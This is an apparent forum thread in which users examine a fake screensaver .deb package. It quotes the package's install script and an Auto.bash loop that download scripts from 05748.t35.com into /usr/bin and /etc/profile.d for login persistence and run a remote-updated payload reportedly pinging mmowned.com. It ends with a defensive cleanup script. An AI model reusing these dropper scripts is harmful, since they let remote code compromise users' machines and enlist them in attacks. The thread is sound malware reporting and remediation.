Hello guys, I'm going to make this brief. I have installed a deb from a site claiming to be a screensaver; however, it looked dodgy, but I proceeded. After I looked into the source I found MYSTERIOUS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below) (also no screensaver was ever shown in gnome-screensaver)

Code:
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

I'm no expert, but this looks just wrong!! I have removed the package; however, I doubt this has done much good... Please help. Comments exist from other users who have downloaded this file not understanding why their screensaver did not show up, and they probably left the file installed. This all literally happened in the last few minutes and I'm afraid to reboot my computer. Should I reinstall my GNOME packages? Or was I just being paranoid? I'm thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack... Sorry for sounding strange, just trying to fix this A.S.A.P. Thank you for any suggestions.
Last edited by dmizer; December 9th, 2009 at 02:06 AM. Reason: removed hyperlinking to malicious URLs
Excuse my noobishness, but it appears that the DEB replaces those two files and changes their permissions to 777. I would be curious to see the contents of the two files to see what they are trying to do. It does appear you have clicked when you should have clacked, though.
What is the link (URL) for this alleged screensaver? Please, not as a hyperlink but as plain text.
Definitely not a screensaver. I looked at some of the scripts that it downloads and most of them are pretty simplistic, so no idea what it is trying to do, but I'm not seeing it do much. For instance, the bash replacement seems to just ping a site, "mmowned.com" or some such.
This is the contents of the Auto.bash script.

Code:
while :
do
    rm /usr/bin/run.bash
    cd /usr/bin/
    wget http://05748.t35.com/Bots/index.php
    wget http://05748.t35.com/Bots/run.bash
    sleep 4
    rm index.php
    chmod 755 run.bash
    command -p /usr/bin/run.bash
done

You may want to see if run.bash is running. If so, kill it, and then remove it from /usr/bin/. gnome.sh runs Auto.bash. Also, you can whois mmowned.com and complain to the hosting company. Interesting: I just looked up the hosting company and they advertise protection against DoS attacks.
Last edited by pbrane; December 8th, 2009 at 08:54 PM.
Originally Posted by conorsulli

Code:
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

Ultimately this seems to be happening: ping -s 65507 www.mmowned.com, which may happen every time you log in; plus it seems designed to keep what it can run updated. There's a PHP file involved too, but I cannot figure out what part that has to play. I think you may have just been PWNED.
OK guys, please help me get this file removed from gnome-look. I have browsed the source code and it contains something definitely malicious: http://www.gnome-look.org/content/sh...content=116772 . Please don't install it. I'm working on contacting others who have installed it and redirecting them here to resolve the issue.
Last edited by conorsulli; December 9th, 2009 at 05:27 AM.
Yes, noticed this after further looking... gonna get this guy good.
OMG, I installed this earlier today. It hasn't done anything to me yet. Please tell me how to remove it!
No, you're right. Whatever goes into /etc/profile.d gets run every time someone logs in. It then downloads another script and runs that. Right now, it is just ping -s 65507 www.mmowned.com, which could at least be used to collect IPs, if this person is also responsible for mmowned.com. Since this script could be replaced with something else at any time, it could easily be used to make your computer assist in a "Denial of Service" attack. I'm not an expert on stuff like that either, but it certainly is not an innocent thing to do. As you guess, it probably is intended to be forgotten quickly as just "not working".
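The removal steps scattered through the thread (check whether run.bash is running, kill it, remove the dropped files from /usr/bin and /etc/profile.d, and treat anything in /etc/profile.d as login persistence) put together as one script. This is an added example, not code from the thread or from the package; it assumes only the file names and the download host exactly as quoted in the posts above. ROOT is a hypothetical prefix introduced here so the logic can be tried against a copied directory tree before it is pointed at the live system, and the world-writable check rests on the fact that nothing legitimate in /etc/profile.d is mode 0777.

```shell
#!/bin/sh
# Added example: hunt for and remove the persistence described in the thread above.
# Indicators come straight from the scripts quoted in the posts:
#   - files dropped as /usr/bin/Auto.bash, /usr/bin/run.bash, /etc/profile.d/gnome.sh
#   - scripts that fetch from 05748.t35.com
#   - world-writable (chmod 777) scripts in /etc/profile.d, which run at every login
# ROOT is a hypothetical prefix (an assumption of this example, not from the thread):
# leave it empty for the live system, or point it at a copied tree to test the logic.

DROPPER_HOST='05748.t35.com'
DROPPED_FILES='/usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh'

# find_indicators [ROOT]: print every suspicious path under ROOT, one per line, deduplicated.
find_indicators() {
    root="${1:-}"
    {
        # 1. the exact file names the dropper and Auto.bash create
        for f in $DROPPED_FILES; do
            [ -e "$root$f" ] && printf '%s\n' "$root$f"
        done
        # 2. anything in profile.d or /usr/bin that phones home to the dropper host
        grep -ls "$DROPPER_HOST" "$root"/etc/profile.d/* "$root"/usr/bin/* 2>/dev/null || true
        # 3. world-writable files in profile.d (-perm -0002 is the portable spelling)
        find "$root/etc/profile.d" -type f -perm -0002 2>/dev/null || true
    } | sort -u
}

# stop_loop: Auto.bash re-downloads run.bash forever, and run.bash was seen running
# ping -s 65507, so stop the processes first or the files come straight back.
stop_loop() {
    if command -v pkill >/dev/null 2>&1; then
        pkill -f '/usr/bin/Auto.bash' 2>/dev/null || true
        pkill -f '/usr/bin/run.bash' 2>/dev/null || true
        pkill -f 'ping -s 65507' 2>/dev/null || true
    fi
}

# clean [ROOT]: stop the loop, delete every indicator, then re-scan.
# Returns 0 only when the re-scan finds nothing.
clean() {
    root="${1:-}"
    stop_loop
    find_indicators "$root" | while read -r path; do
        rm -f "$path"
    done
    [ -z "$(find_indicators "$root")" ]
}

# usage: sudo sh hunt.sh --scan      (list only)
#        sudo sh hunt.sh --clean     (kill, delete, verify)
case "${1:-}" in
    --scan)  find_indicators "${ROOT:-}" ;;
    --clean) clean "${ROOT:-}" ;;
esac
```

Run `--scan` first and read the list: the host-string grep over /usr/bin is deliberately broad, so anything unexpected there deserves a look before `--clean` deletes it. Removing the files does not undo what run.bash may have done while it ran, and because the dropper can serve a different run.bash at any time, a machine that has been running the loop for a while is better rebuilt than trusted.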